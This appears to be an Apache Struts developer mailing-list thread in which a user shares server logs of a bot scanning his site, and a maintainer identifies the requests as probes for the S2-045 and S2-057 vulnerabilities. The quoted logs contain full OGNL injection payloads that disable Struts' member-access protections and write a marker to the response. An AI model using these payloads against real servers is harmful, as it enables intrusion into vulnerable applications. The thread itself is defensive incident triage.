Yes, that's ok. wt., 22 sty 2019 o 09:58 Greg Huber <gregh3...@gmail.com> napisał(a): > > Always on the latest. There was a typo in my reply, sorry :-) > > ....OK, thanks, good work! Did return 500 so looks LIKE NO damage was done. > > On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <lukaszlen...@apache.org> wrote: > > > This looks like https://cwiki.apache.org/confluence/display/WW/S2-045 > > What version of Struts do you run? > > > > Cheers > > Lukasz > > > > niedz., 20 sty 2019 o 19:11 Greg Huber <gregh3...@gmail.com> napisał(a): > > > > > > OK, thanks, good work! Did return 500 so looks damage was done. > > > > > > from the logs > > > 2019-01-18 18:13:33,218 WARN > > > org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest > > > JakartaMultiPartRequest:parse - Unable to parse request > > > org.apache.commons.fileupload.InvalidFileNameException: Invalid file > > name: > > > > > %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS > > > > > ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class > > > > > )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest > > > ()).(#res=@org.apache.struts2.ServletActionContext@getResponse > > > > > ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b > > > at > > > > > org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187) > > > ~[commons-fileupload-1.4.jar:1.4] > > > at > > > > > org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253) > > > ~[commons-fileupload-1.4.jar:1.4] > > > .... > > > .... > > > 2019-01-18 18:13:35,032 WARN > > > org.apache.struts2.dispatcher.mapper.DefaultActionMapper > > > DefaultActionMapper:cleanupMethodName - > > > #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS > > > ,#req=@org.apache.struts2.ServletActionContext@getRequest > > > (),#res=@org.apache.struts2.ServletActionContext@getResponse > > (),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString > > > did not match allowed method names [a-zA-Z_]*[0-9]* - default method > > > execute will be used! > > > > > > Cheers Greg > > > > > > On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <lukaszlen...@apache.org> > > wrote: > > > > > > > niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3...@gmail.com> > > napisał(a): > > > > > > > > > > Any ideas? > > > > > > > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST > > > > > > > > > > > /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action > > > > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0" > > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action > > > > HTTP/1.1" > > > > > 200 2023 "-" "Auto Spider 1.0" > > > > > > > > I would say a robot is scanning Internet to find vulnerable sites and > > > > looks like it addresses the latest vulnerability with namespace > > > > evaluation > > > > https://cwiki.apache.org/confluence/display/WW/S2-057 > > > > > > > > > > > > Regards > > > > -- > > > > Łukasz > > > > + 48 606 323 122 http://www.lenart.org.pl/ > > > > > > > > --------------------------------------------------------------------- > > > > To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org > > > > For additional commands, e-mail: dev-h...@struts.apache.org > > > > > > > > > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org > > For additional commands, e-mail: dev-h...@struts.apache.org > > > >
--------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org For additional commands, e-mail: dev-h...@struts.apache.org
